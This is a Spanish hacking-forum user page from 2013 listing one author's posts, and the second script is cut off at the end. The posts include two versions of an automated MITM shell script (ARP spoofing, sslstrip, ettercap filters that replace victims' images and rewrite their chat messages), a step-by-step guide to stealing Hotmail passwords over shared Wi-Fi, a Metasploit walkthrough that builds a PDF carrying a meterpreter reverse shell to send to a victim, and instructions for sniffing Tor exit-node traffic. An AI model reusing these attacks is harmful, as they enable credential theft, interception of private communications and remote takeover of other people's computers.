elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Script MITM + Fake AP + karmetasploit en: 30 Junio 2013, 04:21 am
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .

Script MITM + FAKE AP en español claro...

REEDITADO, EL SCRIPT ACTUALIZADO CON KARMETASPLOIT MAS ABAJO
2  Comunicaciones / Redes / Ataque MITM automático! en: 19 Abril 2013, 15:59 pm
Os traigo un script automatizado hecho por mi y con una interface amigablee!!

Este es para MITM ya saben...

ESPERO Q LES GUSTE!!

Código:
#!/bin/sh
quit="no"
configuracion_todo () {
clear
echo "------------------------------------------------"
echo "Creando los filtros para ettercap..."
echo "------------------------------------------------"
sleep 1
echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter
echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter
echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter
echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter
echo "   }" >> mitmsg.filter
echo "}" >> mitmsg.filter
echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter
echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter
echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter
echo "# note: replacement string is same length as original string" >> mitm.filter
echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter
echo "   }" >> mitm.filter
echo "}" >> mitm.filter
echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter
echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "msg(\"Filter Ran. \\n\");" >> mitm.filter
echo "}" >> mitm.filter
echo "--------------------------------------------> OK"
echo ""
sleep 1
echo "------------------------------------------------"
echo "Configurar equipo para el ataque MITM"
echo "------------------------------------------------"
sleep 1
echo "Verificando los paquetes necesarios..."
echo "------------------------------------------------"
echo "xterm"
verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "xterm ya está instalado"
else
echo "xterm no está instalado, INSTALANDO..."
sleep 1
sudo apt-get --force-yes install xterm &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "sslstrip"
verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "sslstrip ya está instalado"
else
echo "sslstrip no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install sslstrip &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "ettercap"
verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}')
if [ "$verificacion" = "install" ]; then
echo "ettercap ya está instalado"
else
echo "ettercap no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install ettercap &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "dsniff"
verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "dsniff ya está instalado"
else
echo "dsniff no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install dsniff &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "driftnet"
verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "driftnet ya está instalado"
else
echo "driftnet no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install driftnet &
fi
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo ""
echo "Verificación de paquetes finalizada..."
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 1
echo "Activando ip_forward"
xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
echo "--------------------------------------------> OK"
sleep 1
echo "Configurando iptables"
xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "--------------------------------------------> OK"
sleep 2
echo "Indica tu interface de red:"
echo "Ej: wlan0, eth1 ..."
echo ""
iwconfig
echo "------------------------------------------------"
interface=$(zenity --entry \
--title=".:MITM:." \
--text="Indica tu interface de red:" \
--text="(ej: wlan0, eth1, etc...)" \
)
sleep 1
echo ""
echo "--------------------------------------------> OK"
sleep 2
}
busc_victima () {
clear
echo "------------------------------------------------"
echo "Buscar víctima..."
echo "------------------------------------------------"
sleep 1
echo ""
echo "Mostrando tu dirección ip:"
sleep 1
tuip=$(ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20)
ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20
echo "------------------------------------------------"
echo "Indica el rango a escanear (ej: 192.168.0.* )"
echo "------------------------------------------------"
rango=$(zenity --entry \
--title="Rango a escanear por nmap .:MITM:." \
--text="Indica el rango a escanear" \
--text="Tu ip es:" \
--text="$tuip" \
)
sleep 1
echo "------------------------------------------------"
echo "Mostrando lista de usuarios conectados a la red"
echo "------------------------------------------------"
sleep 1
xterm -T "Lista de usuarios conectados a la red .:MITM:." -n "AQQLE .:MITM:."-hold -e nmap -sP $rango --system-dns &
}
inic_mitm () {
clear
echo "------------------------------------------------"
echo "Iniciar ataque MITM"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Iniciando sslstrip"
xterm -hold -e sslstrip -a -k -f &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando arpspoof"
echo "Indica la ip de la puerta de enlace:"
echo "------------------------------------------------"
penlaces=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la puerta de enlace:" \
--text="ej: 192.168.0.1" \
)
sleep 1
echo "------------------------------------------------"
echo "Indica la ip de la víctima:"
echo "------------------------------------------------"
victima=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la víctima" \
)
sleep 1
xterm -hold -e arpspoof -i $interface -t $victima $penlaces &
echo "--------------------------------------------> OK"
sleep 3
echo ""
echo "Iniciando ettercap"
xterm -hold -e sudo ettercap -T -q -i $interface &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando driftnet"
sleep 10
xterm -hold -e driftnet -i $interface &
echo "--------------------------------------------> OK"
echo ""
echo "Iniciando urlsnarf"
sleep 1
xterm -hold -e urlsnarf -i $interface &
echo "--------------------------------------------> OK"
sleep 2
}
salida_x () {
clear
sleep 2
echo "Desactivando ip_forward"
xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward &
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Eliminando posibles filtros creados"
echo""
nohup rm imagen.ef
nohup rm msg.ef
echo ""
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 2
rm mitm.filter
rm mitmsg.filter
rm nohup.out
clear
}
camb_imagen () {
clear
echo "------------------------------------------------"
echo "Cambiar imagenes"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica la dirección de la imagen falsa:"
echo "Ej: http://www.arcpujol.com/construccio.jpg"
echo "------------------------------------------------"
direccionfalsa=$(zenity --entry \
--title="Construyendo filtro .:MITM:." \
--text="Indica la dirección de la imagen falsa:" \
--text="Ej: http://www.pagweb/imagen.jpg" \
)
xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter &
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitm.filter -o imagen.ef &
echo "--------------------------------------------> OK"
rm mitm.filter
mv mitm.filtere mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
camb_msn () {
clear
echo "------------------------------------------------"
echo "Cambiar los mensajes salientes de msn"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica primero qué palabra quieres cambiar"
echo "Ej: hola"
echo "------------------------------------------------"
convfalsa=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica primero qué palabra quieres cambiar" \
)
cp mitmsg.filter mitmsg.filter1
xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter &
echo ""
rm mitmsg.filtere
echo "Indica la palabra que sustituirá a la anterior"
echo "Ej: perra"
echo "------------------------------------------------"
convfalsa1=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica la palabra que sustituirá a la anterior" \
)
xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter &
rm mitmsg.filtere
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitmsg.filter -o msg.ef &
echo "--------------------------------------------> OK"
rm mitmsg.filter
mv mitmsg.filter1 mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
while [ $quit != "yes" ]
do
clear
echo "------------------------------------------------"
echo "     AQQLE  /     AQQLE /    AQQLE /     AQQLE/"
echo "AQQLE/     /AQQLE/     /AQQLE /   /AQQLE/    /"
echo "    / AQQLE     /AQQLE/      /AQQLE    / AQQLE"
echo "------------------------------------------------"
echo ""
echo ""
echo "Menú de opciones MITM"
echo "================================================"
echo "*   Configuración necesaria para el ataque MITM"
echo "------------------------------------------------"
echo "*   Buscar víctima"
echo "*   Iniciar ataque MITM"
echo "*   Cambiar las imagenes entrantes a la víctima"
echo "*   Cambiar las conversaciones de msn salientes"
echo "------------------------------------------------"
echo "*   Salir"
echo "------------------------------------------------"
echo ""
echo -n "Escoje acción"

eleccion=$(zenity --list --column "Opciones:" "Configuración" "Buscar víctima" "Iniciar ataque MITM" "Cambiar imagenes entrantes" "Cambiar conversaciones salientes" "Salir" --text "Escoje acción:" --title="Menú .:MITM:. por aqqle" --height=245 --width=250)

if [ "$eleccion" = "Configuración" ]; then
configuracion_todo;

elif [ "$eleccion" = "Buscar víctima" ]; then
busc_victima;

elif [ "$eleccion" = "Iniciar ataque MITM" ]; then
inic_mitm;

elif [ "$eleccion" = "Cambiar imagenes entrantes" ]; then
camb_imagen;
elif [ "$eleccion" = "Cambiar conversaciones salientes" ]; then
camb_msn;
elif [ "$eleccion" = "Salir" ]; then
salida_x;
quit="yes";
else
exit 0
fi
done
3  Seguridad Informática / Hacking / Infectar archivo pdf en: 17 Abril 2013, 19:20 pm
Muy buenas,
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...

Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...

Crearemos una conexión de la víctima  a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...

Abriremos una terminal y tecleamos:
Código:
msfconsole  #quizá tengáis que usar sudo msfconsole...

Una vez cargado metasploit:
Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
Código:
set FILENAME aqqle.pdf

Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:
Código:
set OUTPUTPATH /home/bugtraq/
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
Código:
set LHOST 192.168.0.199
Indicamos el puerto...
Código:
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:
Código:
set id 0

Ahora toca hacer el exploit...
Código:
exploit

Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código:
back
Nos pondremos a la escucha usando:
Código:
use exploit/multi/handler
Le indicamos el PAYLOAD:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:
Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Indicamos id=0:
Código:
set id 0

Finalmente...
Código:
exploit


Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!

Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..

Lo siento Sergi...   ;-)

Saludos!

. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .
4  Seguridad Informática / Hacking / tor, amigo o enemigo? en: 17 Abril 2013, 00:24 am
Muy buenas tardes!

Después de estar unos días buceando por la deepweb, me preocupó el hecho de que la red tor se creara como proyecto militar... Después de ver como funciona, pensé... aquí seguro se puede meter mano y después de surfear un poco encontré lo que buscaba.

Para hacernos una idea, la forma en que tor realiza el anonimato es la siguiente:

mi pc -----------> nodo 1 (información ahora cifrada) --------> nodo 2 (info cifrada) --------> nodo 3 (info cifrada) ---------> nodo 4 (se descifra la info) ------> web

Como podemos ver, la información se descifra en el último nodo... así entonces hay mucha info en texto plano  ;)

Si configuramos nuestro TOR (intentadlo vosotros pq en mi bugtraq no he podido, entiendo que debido a la versión de vidalia ?¿?¿) para que actue como nodo de salida y le metemos un snifer obtenemos gran información  :twisted:

Primero en vidalia, vamos a configuración y abrimos la siguiente pestaña:


Rellenamos la información de "Basic Settings" con un nombre de usuario, una dirección de contacto, y en la pestaña de Exit Policies activamos las que nos interesen, en este caso activaremos:

Bien, ya podemos iniciar TOR...

Vamos a empezar a esnifar  :o  (ya me entienden...  :xD) Para ello utilizaremos tcpflow, si no lo tienen:
Código:
sudo apt-get install tcpflow
Ahora toca disfrutar:
Código:
sudo tcpflow -i eth0 port 80
sudo tcpflow -i eth0 port 110
sudo tcpflow -i eth0 port 143

Esto nos permitirá interceptar el tráfico de personas que utilizan la red TOR...

¿Realmente estamos seguros de querer usar TOR?


Otras entradas:
------------------------------------------------> SCRIPT MITM AUTOMATIZADO

http://foro.elhacker.net/hacking_avanzado/script_automatizado_para_ataque_mitm-t388207.0.html

------------------------------------------------> MITM paso a paso

http://foro.elhacker.net/hacking_avanzado/mitm_paso_a_paso-t388212.0.html

------------------------------------------------> Infectar archivo pdf

http://foro.elhacker.net/hacking_avanzado/infectar_archivo_pdf-t388282.0.html
5  Seguridad Informática / Hacking / MITM paso a paso... en: 17 Abril 2013, 00:20 am
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .
Muy buenas!
Os traigo el tradicional MITM mostrado paso a paso...
Antes de empezar hablaremos un poco de qué se trata este ataque... El ataque Man In The Middle justifica su propio nombre. Antes de empezar a ver el ataque, vamos a ver de qué se trata este...  ::)
http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle

Os recomiendo leerlo...  ;-)
Os intentaré explicar a grandes rasgos y como buenamente pueda esta práctica. En una conexión "normal" nos encontramos a un usuario conectado a un router navegando felizmente, igual que él todo el resto de usuarios que utilicen el mismo punto de acceso. Para hacernos una idea, esta sería una situación "normal":

INTERNET
|
|
|
|
|
USUARIO <-----------------------------> ROUTER <-----------------------------> USUARIO

En nuestro caso, lo que haremos será conectarnos entre el router y el usuario (víctima), de tal forma que toda conversación entre estos dos pasa por nuestro equipo. En cierto modo nos convertimos en "repetidores" de información:

ROUTER <-----------------------------> ATACANTE <-----------------------------> USUARIO

¿Y para qué?! Pues para filtrar todos los paquetes de información que pasen por la wifi... Esto nos permite entre otras conocer las URL que visite la víctima, usuario en páginas web, password, ver las imágenes que él ve, cambiar conversaciones de msn y un largo etc... suena bien no? ;) Antes de empezar, recordaros que realicé un script para automatizar el proceso:

http://foro.elhacker.net/hacking_avanzado/script_automatizado_para_ataque_mitm-t388207.0.html

Vamos al lío..
Mejor prevenir que curar... Sería conveniente cambiar nuestra MAC por si acaso... Es necesario conocer nuestra interface. Lo haremos con
Código:
ifconfig

Lo cual nos arroja:


En mi caso mi interface de wifi es wlan0. Para cambiar la dirección mac podemos hacer un:
Código:
sudo macchanger -a wlan0

Este cambiará nuestra dirección mac gracias a la opción -a, wlan0 recuerda que es mi interface. Una vez hecho el cambio de MAC seguimos...
En nuestro bugtraq lo primero será configurar el archivo etter.conf, eliminando las # en iptables (firewall). Al eliminar las # configuramos iptables permitiendonos que ettercap filtre las conexiones SSL (¿os suena https? :D ). Para ello:
Código:
sudo leafpad /etc/etter.conf

Buscamos las siguientes lineas:


Y eliminamos las # de tal modo que nos quedará así:
Código:
#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Guardamos y podemos dejarlo abierto, ya que al finalizar es conveniente volverlo a dejar como estaba. Una vez configurado etter.conf vamos a activar la directiva ip_forward que por defecto aparece desactivada con valor 0. Vamos a activarla con:
Código:
echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward

A continuación vamos a configurar iptables para que redireccione las conexiones tcp que pasen entre los puertos 80 a 10000:
Código:
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Una vez configurado todo esto, empezamos el ataque. Iniciaremos ssltrip, el cual destripará la seguridad https  ;) . Para ello utilizaremos:
Código:
sslstrip -a -k -f

La opción -a de sslstrip nos sirve para crear un log de todo tráfico http, su opción -k mata las posibles sesiones SSL en proceso y finalmente -f fuerza el sistema de seguridad favicon. Al hacer esto nos quedará una ventana como esta:

¡NO CERREIS LA VENTANA!

Abrimos otra terminal y buscaremos alguna víctima. Lo primero ver nuertra dirección ip local. Antes la hemos visto 192.168.1.33. Podemos verla utilizando:
Código:
 ifconfig wlan0 | grep inet

Su respuesta:


Vemos nuevamente que la dirección local es 192.168.1.33. Vamos ahora a utilizar nmap para buscar víctimas para nuestro ataque... Indicaremos un rango de IPs a buscar de la siguiente forma 192.168.1.* lo cual nos queda:
Código:
nmap -sP 192.168.1.*

Nmap nos contesta:


Con la opción -sP nos muestra los equipos conectados sin ir mas allá en su escaneo. Vemos que estamos nosotros 192.168.1.33, el router 192.168.1.1 y la víctima :P 192.168.1.34. Es momento de iniciar arpspoof, con su opción -i indicamos la interface, en mi caso wlan0, con -t indicamos el objetivo:
Código:
sudo arpspoof -i wlan0 -t 192.168.1.34 192.168.1.1

Con esto envenenamos la tabla ARP consiguiendo hacernos pasar por el router (para la víctima) por la víctima (para el router) :D . Su resultado:


Dejemos esta terminal en marcha (si, ya sé que van 2...) y abramos otra. Con esta finalizaremos el ataque. Vamos a utilizar el conocido sniffer ettercap con sus opciones -T la cual nos iniciará ettercap con su interface de texto, -q para que no nos muestre el contenido de los paquetes y -i indica la interface, en este caso wlan0:
Código:
sudo ettercap -T -q -i wlan0

Si por lo que sea os aparece un mensaje de error parecido a este:
Código:
]SEND L3 ERROR: 10250 byte packet (0800:06) destined to was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
Parar firestarter...
Si no os aparece ningún error, tenemos ahora mismo el ataque en marcha.

Aún y así damos un poco el cante, ya que al usuario víctima le aparece el siguiente mensaje:


De todas formas, como el usuario quiere conectarse a su hotmail, fácilmente presionará sobre "Entiendo los riesgos" (Explorer) o "Continuar de todos modos" (en firefox)... A la que el usuario se conecte a su correo hotmail por ejemplo, nos aparecerá lo siguiente:

USER Y PASSWORD!!!
Lo siento nuevamente Sergi...

Si queréis probar, os recomiendo el SCRIPT que colgué en este foro

Todo esto da mucho que pensar... ¿o no?
6  Seguridad Informática / Hacking / Script automatizado para ataque MITM en: 16 Abril 2013, 23:24 pm
Muy buenas señores,
Les traigo un script que he realizado y he creído conveniente publicar, ya que es una pena dejarlo en el bahúl de las herramientas...

Es para realizar un ataque MITM, supongo que ya sabrán de qué va la historia...

¿Qué nos permite hacer este script?
Ver las direcciones que está viendo otro usuario de la wifi, ver su usuario y password de gmail, facebook, messenger, hotmail, etc etc (aún y usar el https   :silbar:), ver las imágenes que está viendo (y cambiarlas jajajaja  ;-) ) tmb cambiar conversaciones del msn (la víctima pone "hola" y lo cambiamos a "Perra"  :¬¬ ) en fin aya cada uno...

Eso si, está realizado para ubuntu.. y supongo que alguna otra plataforma linux, yo personalmente uso bugtraq y funciona de maravilla.
Aquí el code..
Código:
#!/bin/sh
quit="no"
configuracion_todo () {
clear
echo "------------------------------------------------"
echo "Creando los filtros para ettercap..."
echo "------------------------------------------------"
sleep 1
echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter
echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter
echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter
echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter
echo "   }" >> mitmsg.filter
echo "}" >> mitmsg.filter
echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter
echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter
echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter
echo "# note: replacement string is same length as original string" >> mitm.filter
echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter
echo "   }" >> mitm.filter
echo "}" >> mitm.filter
echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter
echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "msg(\"Filter Ran. \\n\");" >> mitm.filter
echo "}" >> mitm.filter
echo "--------------------------------------------> OK"
echo ""
sleep 1
echo "------------------------------------------------"
echo "Configurar equipo para el ataque MITM"
echo "------------------------------------------------"
sleep 1
echo "Verificando los paquetes necesarios..."
echo "------------------------------------------------"
echo "xterm"
verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "xterm ya está instalado"
else
echo "xterm no está instalado, INSTALANDO..."
sleep 1
sudo apt-get install xterm &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "sslstrip"
verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "sslstrip ya está instalado"
else
echo "sslstrip no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install sslstrip &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "ettercap"
verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}')
if [ "$verificacion" = "install" ]; then
echo "ettercap ya está instalado"
else
echo "ettercap no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install ettercap &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "dsniff"
verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "dsniff ya está instalado"
else
echo "dsniff no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install dsniff &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "driftnet"
verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "driftnet ya está instalado"
else
echo "driftnet no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install driftnet &
fi
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo ""
echo "Verificación de paquetes finalizada"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 1
echo "Activando ip_forward"
xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
echo "--------------------------------------------> OK"
sleep 1
echo "Configurando iptables"
xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "--------------------------------------------> OK"
sleep 2
echo "Indica tu interface de red:"
echo "Ej: wlan0, eth1 ..."
echo "------------------------------------------------"
read interface
sleep 1
echo ""
echo "--------------------------------------------> OK"
sleep 1

}
busc_victima () {
clear
echo "------------------------------------------------"
echo "Buscar víctima..."
echo "------------------------------------------------"
sleep 1
echo ""
echo "Mostrando tu dirección ip:"
sleep 1
ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20
echo "------------------------------------------------"
echo "Indica el rango a escanear (ej: 192.168.0.* )"
echo "------------------------------------------------"
read rango
sleep 2
echo "------------------------------------------------"
echo "Mostrando lista de usuarios conectados a la red"
echo "------------------------------------------------"
sleep 3
xterm -hold -e nmap -sP $rango --system-dns &
}
inic_mitm () {
clear
echo "------------------------------------------------"
echo "Iniciar ataque MITM"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Iniciando sslstrip"
xterm -hold -e sslstrip -a -k -f &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando arpspoof"
echo "Indica la ip de la puerta de enlace:"
echo "------------------------------------------------"
read penlaces
sleep 1
echo "------------------------------------------------"
echo "Indica la ip de la víctima:"
echo "------------------------------------------------"
read victima
sleep 1
xterm -hold -e arpspoof -i $interface -t $victima $penlaces &
echo "--------------------------------------------> OK"
sleep 3
echo ""
echo "Iniciando ettercap"
xterm -hold -e sudo ettercap -T -q -i $interface &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando driftnet"
sleep 10
xterm -hold -e driftnet -i $interface &
echo "--------------------------------------------> OK"
echo ""
echo "Iniciando urlsnarf"
sleep 1
  xterm -hold -e urlsnarf -i $interface &
echo "--------------------------------------------> OK"
sleep 2
}
salida_x () {
clear
sleep 2
echo "Desactivando ip_forward"
xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward &
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Eliminando posibles filtros creados"
rm imagen.ef
rm msg.ef
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 2
rm mitm.filter
rm mitmsg.filter
clear
}
camb_imagen () {
clear
echo "------------------------------------------------"
echo "Cambiar imagenes"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica la dirección de la imagen falsa:"
echo "Ej: http://www.arcpujol.com/construccio.jpg"
echo "------------------------------------------------"
read direccionfalsa
xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter &
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitm.filter -o imagen.ef &
echo "--------------------------------------------> OK"
rm mitm.filter
mv mitm.filtere mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
camb_msn () {
clear
echo "------------------------------------------------"
echo "Cambiar los mensajes salientes de msn"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica primero qué palabra quieres cambiar"
echo "Ej: hola"
echo "------------------------------------------------"
read convfalsa
cp mitmsg.filter mitmsg.filter1
xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter &
echo ""
rm mitmsg.filtere
echo "Indica la palabra que sustituirá a la anterior"
echo "Ej: perra"
echo "------------------------------------------------"
read convfalsa1
